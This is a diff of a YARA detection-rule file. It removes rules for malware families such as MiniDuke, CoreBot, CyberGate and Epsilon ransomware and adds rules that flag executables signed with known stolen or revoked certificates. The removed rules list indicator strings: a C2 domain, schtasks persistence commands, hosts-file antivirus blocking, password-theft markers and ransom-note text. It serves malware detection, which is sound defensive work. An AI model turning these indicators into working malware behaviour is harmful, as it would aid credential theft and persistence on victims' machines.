+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SequenceDesigner" and ( pe.signatures [ i ] . serial == "cf:ae:7e:6f:53:8b:9f:2e" or pe.signatures [ i ] . serial == "00:cf:ae:7e:6f:53:8b:9f:2e" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Fatduke : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Bc9B800F480691Bd6B60963466B0C75 : FILE
 {
 	meta:
-		description = "Detects FatDuke"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dc80c0f0-c61c-5f0c-841b-3a75e8a1cef3"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "ff76c8b3-8120-54ed-90e1-3ee01e57895e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3931-L3946"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7114-L7125"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7923d15b10098e9402614fe7107a6ba1d71512efa6e462d522ef64e13f82b47"
+		logic_hash = "15143a6dc374f22252880ce61a419df46d81bc1ee99a29d03a61348f9c230064"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\?\\Volume" fullword ascii
-		$s2 = "WINHTTP_AUTOPROXY_OPTIONS@@PAUWINHTTP_PROXY_INFO@@" ascii
-		$s3 = "WINHTTP_CURRENT_USER_IE_PROXY_CONFIG@@" ascii
-		$s4 = "Cannot write a Cannot find the too long string mber of records Log malfunction! Cannot create ain an invalid ra Internal sync iright function iWaitForSingleObjffsets" ascii
-		$pattern = "()$^.*+?[]|\\-{},:=!" ascii
-		$b64 = "eyJjb25maWdfaWQiOi" wide
+		thumbprint = "8b6c4fc3d54f41ac137795e64477491c93bdf7f1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $b64 and 2 of them ) or ( #pattern > 3 and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" )
 }
-rule DITEKSHEN_MALWARE_Win_Miniduke : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_69Ad1E8B5941C93D5017B7C3Fdb8E7B6 : FILE
 {
 	meta:
-		description = "Detects MiniDuke"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "947cd414-d19d-5543-8961-94aef69cc94e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "4b961b30-dc0d-513c-8a66-ed8fe71f5439"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3948-L3969"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7127-L7138"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3ab139b4fda2ff9678ceecbdf5ac0c57536bd658f62aa9d19610028b0a5f92c"
+		logic_hash = "1a37133dcc7af9c3f229f517dca847d7c007b8a2fdc6af50721d68f68c5d9c20"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DefPipe" fullword ascii
-		$s2 = "term %5d" fullword ascii
-		$s3 = "pid %5d" fullword ascii
-		$s4 = "uptime %5d.%02dh" fullword ascii
-		$s5 = "login: %s\\%s" fullword ascii
-		$s6 = "Software\\Microsoft\\ApplicationManager" ascii
-		$s7 = { 69 64 6c 65 ?? 00 73 74 6f 70 ?? 00 61 63 63 65 70 74 ?? 00 63 6f 6e 6e 65 63 74 ?? 00 6c 69 73 74 65 6e ?? 00 }
-		$net1 = "salesappliances.com" ascii
-		$net2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" fullword ascii
-		$net3 = "http://10." ascii
-		$net4 = "JiM9t8g7j8KoJkLJlKqka8dbo7q5z4v5u3o4z" ascii
-		$net5 = "application/octet-stream" ascii
-		$net6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" ascii
+		thumbprint = "9b6f3b3cd33ae938fbc5c95b8c9239bac9f9f7bf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $net* ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Afia Wave Enterprises Oy" and pe.signatures [ i ] . serial == "69:ad:1e:8b:59:41:c9:3d:50:17:b7:c3:fd:b8:e7:b6" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Polyglotduke : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_072472F2386F4608A0790Da2Be8A48F7 : FILE
 {
 	meta:
-		description = "Detects PolyGlotDuke"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "01ac90db-35f6-5192-8630-81000573b4f9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "79f1e6da-003a-5291-a60c-7693ca2efbeb"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3971-L3986"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7140-L7151"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c1fb8ea1d21768cbd65bd7b91e3f817fa97a0a933b511dff2ae4d5db49bdb2ec"
+		logic_hash = "32b61f42ee9f3109c747e8a159376d03349d8a5061be0c31504e929cb3c3042e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = { 48 b9 ff ff ff ff ff ff ff ff 51 48 23 8c 24 ?? 00 00 00 48 89 8C 24 00 00 00 00 }
-		$s2 = { 56 be ff ff ff ff 56 81 e6 7f }
-		$s3 = { 48 8b 05 19 ?4 4b 00 48 05 48 83 00 00 4c 8b 44 24 50 8b 54 24 48 48 8b }
+		thumbprint = "e2a79e70b7a16a6fc2af7fbdc3d2cbfd3ef66978"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) ) or ( 2 of them and pe.exports ( "InitSvc" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FOXIT SOFTWARE INC." and pe.signatures [ i ] . serial == "07:24:72:f2:38:6f:46:08:a0:79:0d:a2:be:8a:48:f7" )
 }
-rule DITEKSHEN_MALWARE_Win_Guidlma : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : FILE
 {
 	meta:
-		description = "Detects Guildma"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "135ddc6a-5001-54c0-a66c-3e0e5fe6319f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "4e40ce70-d5d1-5719-bb43-40f860510093"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3988-L4006"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7153-L7168"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "11a0d9c67139627b6820c928840d816ed22b48452ce0b2f856c86c183cdfc8ab"
+		logic_hash = "e2d07a2af36608d6eab6db85bcb968e486293239d0cfaeea7de2bb8223e58a29"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$v1_1 = "marxvxinhhm98.dll" fullword wide
-		$v1_2 = "marxvxinhhmxa.gif" fullword wide
-		$v1_3 = "marxvxinhhmxb.gif" fullword wide
-		$v1_4 = "c:\\programdata" fullword wide
-		$v1_5 = "\\tempa\\" fullword wide
-		$v2_1 = "C:\\Windows\\System32\\dllhost.exe" fullword ascii
-		$v2_2 = "C:\\Windows\\SysWOW64\\dllhost.exe" fullword ascii
-		$v2_3 = "C:\\Users\\Public\\go" fullword ascii
-		$v2_4 = ":%:*:/:>:C:H:W:\\:a:p:u:z:" fullword ascii
-		$v2_5 = ": :%:*:9:>:C:R:W:\\:k:p:u:" fullword ascii
-		$v2_6 = ":*:/:4:C:H:M:\\:a:f:u:z:" fullword ascii
+		thumbprint = "5ca53cc5c6dc47838bbba922ad217a468408a9bd"
+		hash1 = "293a83bfe2839bfa6d40fa52f5088e43b62791c08343c3f4dade4f1118000392"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $v1* ) or 5 of ( $v2* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Cybergate : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Dfa4F0Cff90319951B019A4681Ebd2A : FILE
 {
 	meta:
-		description = "Detects CyberGate/Spyrat/Rebhip RTA"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3b50ccfb-6603-5002-8ceb-e9252d4c7dff"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bbb0be70-de74-5da9-80d2-2ba474b7f472"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4008-L4026"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7170-L7182"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4a3c07533c2b251e1a714b28fb0b654c76881fb6ce970f6586c5908ee65609b"
+		logic_hash = "d89cda38cf6149c004f7d7b307243567768cba73bd49979d7d4f92f902ef4508"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "UnitInjectLibrary" ascii
-		$s2 = "TLoader" fullword ascii
-		$s3 = "\\\\.\\SyserDbgMsg" fullword ascii
-		$s4 = "\\\\.\\SyserBoot" fullword ascii
-		$s5 = "\\signons" ascii
-		$s6 = "####@####" ascii
-		$s7 = "XX-XX-XX-XX" fullword ascii
-		$s8 = "EditSvr" ascii
-		$s9 = "_x_X_PASSWORDLIST_X_x_" fullword ascii
-		$s10 = "L$_RasDefaultCredentials#0" fullword ascii
-		$s11 = "password" nocase ascii
+		thumbprint = "b85aacac6afb0bef5b6f1d744cd8c278030e6a3e"
+		hash1 = "4eca4e0d3c06e4889917a473229b368bae02f0135f0ac68e937a72fca431ac8a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "deepinstruction O" and pe.signatures [ i ] . serial == "0d:fa:4f:0c:ff:90:31:99:51:b0:19:a4:68:1e:bd:2a" )
 }
-rule DITEKSHEN_MALWARE_Win_WSHRATJS : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4D03Ae6512B85Eab4184Ca7F4Fa2E49C : FILE
 {
 	meta:
-		description = "Detects WSHRAT JS variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7dbaea67-48dc-5fb8-ba58-b0d6eeca207b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a7dc0a07-f295-5aff-9df0-71f27f0fe88c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4028-L4045"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7184-L7196"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9956ed4613ac403360ab0222a7ed62350fcd998710843bd6700717f8bbb5052e"
+		logic_hash = "2cbeaf65b0d3340df08baf67134a2fe0b26921f2e35ce541884209e3ecddf233"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$charset_full = "us-ascii" nocase ascii
-		$charset_begin = "\"us-\"" nocase ascii
-		$charset_end = "Array(97,115,99,105,105)" nocase ascii
-		$wsc_object1 = "WScript.CreateObject(\"System.Text.UTF8Encoding" nocase ascii
-		$wsc_object2 = "WScript.CreateObject(\"Adodb.Stream" nocase ascii
-		$wsc_object3 = "WScript.CreateObject(\"Microsoft.XmlDom" nocase ascii
-		$s1 = "function(){return" ascii
-		$s2 = "}catch(err){" ascii
-		$s3 = "{item: \"bin.base64\"}" nocase ascii
-		$s4 = "* 1].item =" ascii
+		thumbprint = "0215ff94a5c0d97db82e11f87e0dfb4318acac38"
+		hash1 = "18bf017bdd74e8e8f5db5a4dd7ec3409021c7b0d2f125f05d728f3b740132015"
+		importance = 20
 
 	condition:
-		filesize < 400KB and ( $charset_full or ( $charset_begin and $charset_end ) ) and 2 of ( $wsc_object* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lenovo IdeaCentre" and pe.signatures [ i ] . serial == "4d:03:ae:65:12:b8:5e:ab:41:84:ca:7f:4f:a2:e4:9c" )
 }
-rule DITEKSHEN_MALWARE_Win_Quilclipper
+
+rule DITEKSHEN_INDICATOR_KB_CERT_333705C20B56E57F60B5Eb191Eef0D90 : FILE
 {
 	meta:
-		description = "Detects QuilClipper variants mostly in memory or extracted AutoIt script"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bd23ec5a-f21a-5133-a77a-de2615933b82"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e868c3ff-a701-59bd-9cd6-bf49305fe28a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4076-L4094"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7198-L7209"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dcac93806a438b188ae70a679301cb6630b9eb6849bf8fbbb1cea5fed5e7cf75"
+		logic_hash = "f5ca35381842a0ea7c319d8388753347a72fc6df746064e520794aeb4b6724d0"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$cnc1 = "QUILCLIPPER by" ascii
-		$cnc2 = "/ UserName:" ascii
-		$cnc3 = "/ System:" ascii
-		$s1 = "DLLCALL ( \"kernel32.dll\" , \"handle\" , \"CreateMutexW\" , \"struct*\"" ascii
-		$s2 = "SHELLEXECUTE ( @SCRIPTFULLPATH , \"\" , \"\" , FUNC_" ascii
-		$s3 = "CASE BITROTATE" ascii
-		$s4 = "CASE BITXOR" ascii
-		$s5 = "CLIP( FUNC_" ascii
-		$s6 = "CLIPPUT (" ascii
-		$s7 = "FUNC _CLIPPUTFILE(" ascii
-		$s8 = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule" ascii
+		tags = "FILE"
+		thumbprint = "44f0f77d8b649579fa6f88ae9fa4b4206b90b120"
+		importance = 20
 
 	condition:
-		all of ( $cnc* ) or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" )
 }
-rule DITEKSHEN_MALWARE_Win_Spyeye : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_79906Faf4Fbd75Baa10B322356A07F6D : FILE
 {
 	meta:
-		description = "Detects SpyEye"
+		description = "Detects NetSupport (client) signed executables"
 		author = "ditekSHen"
-		id = "aa15220a-6fd4-5c5e-8287-957fc3c3fe52"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "afca727c-ff08-5e47-9ef4-4cd2af96d294"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4096-L4111"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7211-L7222"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "352853d600d1f4fbc09e58b783eb4e13b335fefbfe89842873710f0a9085d107"
+		logic_hash = "59862f31d0ba0cf56a93a86783ad802ea2e511845ab1d141aa224c0c61b720a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "_CLEANSWEEP_" ascii wide
-		$x2 = "config.datUT" fullword ascii
-		$x3 = "webinjects.txtUT" fullword ascii
-		$s1 = "confirm:processCommand" fullword ascii
-		$s2 = "Smth wrong with navigate to REF-PAGE (err code: %d). 0_o" fullword ascii
-		$s3 = "(UTC%s%2.2f) %s" fullword wide
-		$s4 = "M\\F;u`r" fullword ascii
-		$s5 = "]YH0%Yn" fullword ascii
+		thumbprint = "f84ec9488bdac5f90db3c474b55e31a8f10a2026"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NetSupport Ltd" and pe.signatures [ i ] . serial == "79:90:6f:af:4f:bd:75:ba:a1:0b:32:23:56:a0:7f:6d" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Renamer : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_030Ba877Daf788A0048D04A85B1F6Eca : FILE
 {
 	meta:
-		description = "Detects Renamer/Tainp variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9e701bbe-d698-510a-b63d-3c1575dac7b0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "66689847-aa67-5029-9f37-cc410a564633"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4114-L4135"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7224-L7235"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "df80657631f072bc1627e1cf503881a2c065396f8798d7f347259672f600198d"
+		logic_hash = "70b5b9011b53b7c9ac9dc286f3512a7a8bec5ec35ade0ee1c4bedd0a128994da"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "shell\\open\\command=" fullword wide
-		$s2 = "icon=%SystemRoot%\\system32\\SHELL32.dll,4" fullword wide
-		$s3 = "DropTarget" ascii
-		$s4 = "C:\\Windows\\Paint" fullword wide
-		$s5 = "hold.inf" fullword wide
-		$s6 = "Dropped" ascii
+		thumbprint = "1f10c5676a742548fb430fbc1965b20146b7325a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 4 of ( $s* ) and for any directory in pe.data_directories : ( directory.virtual_address != 0 and directory.size == 0 ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Skylum Software USA, Inc." and pe.signatures [ i ] . serial == "03:0b:a8:77:da:f7:88:a0:04:8d:04:a8:5b:1f:6e:ca" )
 }
-rule DITEKSHEN_MALWARE_Win_Epsilon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fe83F58D001327Fbaafd7Bac76Ae6818 : FILE
 {
 	meta:
-		description = "Detects Epsilon ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c5561a0d-85ac-5137-a97e-310aa03eb787"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5d41be99-85de-55bc-817b-eea510aff308"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4137-L4169"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7237-L7251"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc4481ddb6f5fd52a0bc901dde4c34ccf79024cd68605245df0dcbea22d0adee"
+		logic_hash = "8aac715daba042ca4a57cd65b98e6192c87a13e7e0c8ff4a3bc81c43223035ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ".Speak \"" wide
-		$s2 = "chkUpdateRegistry" fullword wide
-		$s3 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide
-		$s4 = "CreateObject(\"sapi.spvoice\")" fullword wide
-		$s5 = "READ_ME.hta" wide
-		$s6 = "WScript.Sleep(" wide
-		$s7 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$s8 = "<div class='bold'>Files are encrypted* but not deleted.</div>" ascii
-		$e1 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 2e 00 65 00
-                78 00 65 00 00 09 2e 00 74 00 78 00 74 00 00 09
-                2e 00 64 00 6f 00 63 00 00 0b 2e 00 64 00 6f 00
-                63 00 78 00 00 09 2e 00 78 00 6c 00 73 00 00 0d
-                2e 00 69 00 6e 00 64 00 65 00 78 00 00 09 2e 00
-                70 00 64 00 66 00 00 09 2e 00 7a 00 69 00 70 00
-                00 09 2e 00 72 00 61 00 72 00 00 09 2e 00 63 00
-                73 00 73 00 00 09 2e 00 6c 00 6e 00 6b 00 00 0b
-                2e 00 78 00 6c 00 73 00 78 00 00 09 2e 00 70 00
-                70 00 74 00 00 0b 2e 00 70 00 70 00 74 00 78 00
-                00 09 2e 00 6f 00 64 00 }
-		$e2 = { 68 00 74 00 6d 00 00 07 2e 00 6d 00 6c 00 00 07
-                43 00 3a 00 5c 00 00 07 44 00 3a 00 5c 00 00 07
-                45 00 3a 00 5c 00 00 07 46 00 3a 00 5c 00 00 07
-                47 00 3a 00 5c 00 00 07 5a 00 3a 00 5c 00 00 07
-                41 00 3a 00 5c 00 00 0f 63 00 6d 00 64 00 2e 00
-                65 00 78 00 65 }
+		thumbprint = "c130dd74928da75a42e9d32a1d3f2fd860d81566"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $e* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A. Jensen FLY Fishing ApS" and ( pe.signatures [ i ] . serial == "fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" or pe.signatures [ i ] . serial == "00:fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Corebot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0788260F8541539D97F49Ddaa837B166 : FILE
 {
 	meta:
-		description = "Detects CoreBot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f0351bdb-34ff-5b6d-bc4b-61fc491401ef"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "fb102e07-92fc-5ed8-a9cf-1cfd53f54281"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4171-L4226"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7253-L7265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "518209458fc8912d47b0b99896178fda823c3174c37f21d5e9331349a69322d7"
+		logic_hash = "48985ac2c450bc4b3c5de635717dcf3a7ecf64109aa4059477ba79606f7fc2a4"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920211-920212"
-
-	strings:
-		$f1 = "core.cert_fp" fullword ascii
-		$f2 = "core.crash_handler" fullword ascii
-		$f3 = "core.delay" fullword ascii
-		$f4 = "core.guid" fullword ascii
-		$f5 = "core.inject" fullword ascii
-		$f6 = "core.installed_file" fullword ascii
-		$f7 = "core.plugins_dir" fullword ascii
-		$f8 = "core.plugins_key" fullword ascii
-		$f9 = "core.safe_mode" fullword ascii
-		$f10 = "core.server" fullword ascii
-		$f11 = "core.servers" fullword ascii
-		$f12 = "core.test_env" fullword ascii
-		$f13 = "core.vm_detect" fullword ascii
-		$f14 = "core.vm_detect_skip" fullword ascii
-		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" fullword wide
-		$s2 = "\\Microsoft\\Windows\\AppCache" wide
-		$s3 = "crash_flag" fullword wide
-		$s4 = "container.dat" fullword wide
-		$s5 = "INJECTED" fullword ascii
-		$s6 = "tmp.delete_file" fullword ascii
-		$x1 = "CoreBot v" wide
-		$x2 = "BotName" fullword ascii
-		$x3 = "RunBotKiller" fullword ascii
-		$x4 = "botv" fullword ascii
-		$x5 = "\\CoreBot\\CoreBot\\obj\\" ascii
-		$v1_1 = "newtask" fullword wide
-		$v1_2 = "drivers\\etc\\hosts" fullword wide
-		$v1_3 = "/C schtasks /create /tn \\" wide
-		$v1_4 = "/st 00:00 /du 9999:59 /sc once /ri 1 /f" wide
-		$v1_5 = "AntivirusInstalled" fullword ascii
-		$v1_6 = "payload" fullword ascii
-		$v1_7 = "DownloadFile" fullword ascii
-		$v1_8 = "RemoveFile" fullword ascii
-		$v1_9 = "AutoRunName" fullword ascii
-		$v1_10 = "EditHosts" fullword ascii
-		$v1_11 = /127\.0\.0\.1 (avast|mcafee|eset|avira|bitdefender|bullguard|safebrowse)\.com/ fullword wide
-		$cnc1 = "&os=" fullword wide
-		$cnc2 = "&pv=" fullword wide
-		$cnc3 = "&ip=" fullword wide
-		$cnc4 = "&cn=" fullword wide
-		$cnc5 = "&lr=" fullword wide
-		$cnc6 = "&ct=" fullword wide
-		$cnc7 = "&bv=" fullword wide
-		$cnc8 = "&op=" fullword wide
-		$cnc9 = "&td=" fullword wide
-		$cnc10 = "&uni=" fullword wide
+		thumbprint = "569511fdc5e8dea454e97b005de1af5272d4bd32"
+		hash1 = "6ad407d5c7e4574c7452a1a27da532ee9a55bb4074e43aa677703923909169e4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or all of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $f* ) ) or 3 of ( $x* ) or 8 of ( $v1* ) or ( 4 of ( $cnc* ) and 4 of ( $v1* ) ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechSmith Corporation" and pe.signatures [ i ] . serial == "07:88:26:0f:85:41:53:9d:97:f4:9d:da:a8:37:b1:66" )
 }
